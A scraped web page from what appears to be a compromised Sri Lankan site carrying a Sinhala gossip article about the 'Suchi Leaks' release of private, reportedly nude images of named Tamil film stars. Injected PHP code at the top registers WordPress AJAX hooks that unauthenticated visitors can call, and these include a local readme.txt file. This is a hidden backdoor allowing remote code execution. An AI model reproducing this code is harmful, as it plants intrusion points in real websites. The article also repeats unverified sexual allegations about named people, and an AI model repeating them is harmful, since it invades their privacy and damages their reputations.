if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ‘‘සුචී ලීක්ස්‘‘ ඉන්දියාවම කළඹයි - mediahumanrights.lk
mediahumanrights.lk
Entertainment Entertainment News

‘‘සුචී ලීක්ස්‘‘ ඉන්දියාවම කළඹයි

‘‘සුචී ලීක්ස්‘‘ ඉන්දියාවම කළඹයි – ධනුෂ් සමග යහනේ පෙම් සුව විඳි ගායිකාවක් ට්‍රීෂා හන්සිකා සන්චිතා ඇතුළු කොලිවුඩ් තරු ගණනකගේ නිරුවත් ඡායාරූප හා වීඩියෝ පෙලක් අන්තර්ජාලයට මුදාහරී”
සුචිත්‍රා නම් ඉන්දියාවේ චෙන්නායි හි ගායිකාවක්, ජනප්‍රිය දෙමළ නලු නිළියන්ගේ පෞද්ගලික ඡායාරූප හා වීඩියෝ පට අන්තර්ජාලය වෙත මුදාහැරීමට කටයුතු කර තිබේ.
පසුව මෙම වීඩියෝ පට හා ඡායාරූප අන්තර්ජාලයේ ජනප්‍රිය වීමත් සමග කොලිවුඩ් පුරය උනුසුම් වීමට පටන් ගෙන ඇත.
මෙම ඡායාරූප හා වීඩියෝ පට අතරින් බොහොමයක් නිරුවත් ඒවා වෙති.
ට්‍රීෂා,සිම්බු,ධනුෂ්,අමලා පෝල්,සන්චිතා සෙට්ටි,ප්‍රියා ආනන්ද්,චින්නමායි,අනිරුද්,ෂ්‍රැටි හසන් යන කොලිවුඩ් තරු වල ඡායාරූප හා වීඩියෝ පට මෙසේ නිකුත් වී තිබේ.
කෙසේ වෙතත් ඇගේ ගිණුම හැකර් වරුන්ගේ ප්‍රහාරයකට ලක්වී ඇති බව පසුව කියවුණි.ඇගේ ස්වාමි පුරුෂයා සඳහන් කර තිබුණේ ඇය අයහපත් මානසික තත්වයක පසුවන බවකි.
ඇගේ ටිව්ටර් ගිනුම පසුගිය සිකුරාදා දිනයේ සිට අක්‍රියව තිබුණද,බොහෝ දෙමල නලු නිලියන්ගේ මෙම නිරුවත් ඡායාරූප හා වීඩියෝ පට ‘සුචි ලීක්ස්‘ නමින් ව්‍යාජ ටිවිටර් ගිණුම් ඔස්සේ ප්‍රචාරය වෙමින් තිබේ.
ඇගේ ටිව්ටර් ගිණුම අක්‍රීය වීමට පෙර ඇය විසින් පළකර තිබූ සටහන් වලින් කියැවුණේ,ඇය මෙම වීඩියෝ පට ලබාගත්තේ ධනුෂ්ගේ සහා අනිරුද්ගේ ජංගම දුරකථන වලින් බවයි .ඔවුන් දෙදෙනා තමා සමග ලිංගිකව හැසිරුණු බවද ඇය සඳහන් කර තිබුණි.
තමා ධනුෂ් හා අනිරුද් සමග මීට සතියකට පමණ පෙර, සාදයකට සහභාගී වී සිටියදී මෙසේ සිදුවූ බවද ඇය සඳහන් කර තිබුණි.
මෙම ඡයාරූප හා වීඩියෝ පටයන්හි සත්‍ය අසත්‍ය භාවය මෙතෙක් තහවුරු වී නැතත් ,මේවා බොහෝ විට සත්‍ය විය හැකි යැයි පැවසෙයි.
කෙසේ වෙතත් මෙසේ සිදුකීරීමට නිශ්චිත හේතුව වාර්තා නොවුනද,මෙම ඡායාරූප හා වීඩියෝ පටයන්හි සත්‍ය අසත්‍යභාවය මෙතෙක් අනාවරණය නොවුනද, මේ නිසා බොහෝ කොලිවුඩ් තරුන්ගේ කීරිති නාමයට දැඩි හානියක් සිදුවී තිබේ.
මේ සම්බන්ධව ඇතැම් ජනප්‍රිය නලු නිළියන් ප්‍රතික්ෂේප කර තිබුණද,ඇතැමුන් විශාල නිහඬතාවයක් දක්වන බව ඉන්දීය ආරංචි මාර්ග සඳහන් කරයි
23529-24-12-2013-1-029
32423423
Sanchita Shetty in Soodhu Kavvum _3_ sanchita-shetty_140386709780
 

Related posts

සචිනිට හැඳුනුම්කම්වලට අවස්ථා ලැබෙනවද?

Shiran Viraj

හොඳ නළුවෙක් වෙන්න නම් මුලින්ම ජීවිතය අහුවෙන්න ඕන

Shiran Viraj

ලංකාවේ දේශපාලඥයන්ගේ ඔබ කවදාවත් නොදැකපු සුරූපී දියණියන් සහ කඩවසම් පුතුන් මෙන්න

Shiran Viraj